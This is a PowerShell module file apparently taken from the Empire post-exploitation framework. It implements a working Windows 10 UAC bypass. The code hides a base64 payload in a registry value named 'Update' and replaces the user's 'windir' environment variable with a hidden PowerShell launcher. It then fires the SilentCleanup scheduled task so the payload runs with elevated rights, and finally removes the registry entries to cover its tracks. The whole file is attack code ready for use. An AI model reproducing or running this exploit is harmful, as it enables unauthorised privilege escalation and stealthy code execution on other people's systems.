Empire/data/module_source/privesc/Invoke-EnvBypass.ps1

99 lines
4.1 KiB
PowerShell

function Invoke-EnvBypass {
<#
.SYNOPSIS
Bypasses UAC (even with Always Notify level set) by performing an registry modification of the "windir" value in "Environment" based on James Forshaw findings (https://tyranidslair.blogspot.cz/2017/05/exploiting-environment-variables-in.html)
Only tested on Windows 10
Author: Petr Medonos (@PetrMedonos)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER Command
Specifies the base64 encoded command you want to run in a high-integrity context.
.EXAMPLE
Invoke-EnvBypass -Command "IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
This will write out "Is Elevated: True" to C:\UACBypassTest.
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,
[Switch]
$Force
)
$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
if(($(whoami /groups) -like "*S-1-5-32-544*").length -eq 0) {
"[!] Current user not a local administrator!"
Throw ("Current user not a local administrator!")
}
if (($(whoami /groups) -like "*S-1-16-8192*").length -eq 0) {
"[!] Not in a medium integrity process!"
Throw ("Not in a medium integrity process!")
}
#Begin Execution
#Store the payload
$RegPath = 'HKCU:Software\Microsoft\Windows\Update'
$parts = $RegPath.split('\');
$path = $RegPath.split("\")[0..($parts.count -2)] -join '\';
$name = $parts[-1];
$null = Set-ItemProperty -Force -Path $path -Name $name -Value $Command;
$envCommandPath = "HKCU:\Environment"
$launcherCommand = $pshome + '\' + 'powershell.exe -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -w Hidden -enc $x; Start-Sleep -Seconds 1'
if ($Force -or ((Get-ItemProperty -Path $envCommandPath -Name 'windir' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $envCommandPath -Force |
New-ItemProperty -Name 'windir' -Value $launcherCommand -PropertyType string -Force | Out-Null
}else{
Write-Warning "Key already exists, consider using -Force"
exit
}
if (Test-Path $envCommandPath) {
Write-Verbose "Created registry entries to change windir"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
$schtasksPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'schtasks.exe'
if ($PSCmdlet.ShouldProcess($schtasksPath, 'Start process')) {
$Process = Start-Process -FilePath $schtasksPath -ArgumentList '/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I' -PassThru -WindowStyle Hidden
Write-Verbose "Started schtasks.exe"
}
#Sleep 5 seconds
Write-Verbose "Sleeping 5 seconds to trigger payload"
if (-not $PSBoundParameters['WhatIf']) {
Start-Sleep -Seconds 5
}
$envfilePath = "HKCU:\Environment"
$envfileKey = "windir"
$PayloadPath = 'HKCU:Software\Microsoft\Windows'
$PayloadKey = "Update"
if (Test-Path $envfilePath) {
#Remove the registry entry
Remove-ItemProperty -Force -Path $envfilePath -Name $envfileKey
Remove-ItemProperty -Force -Path $PayloadPath -Name $PayloadKey
Write-Verbose "Removed registry entries"
}
}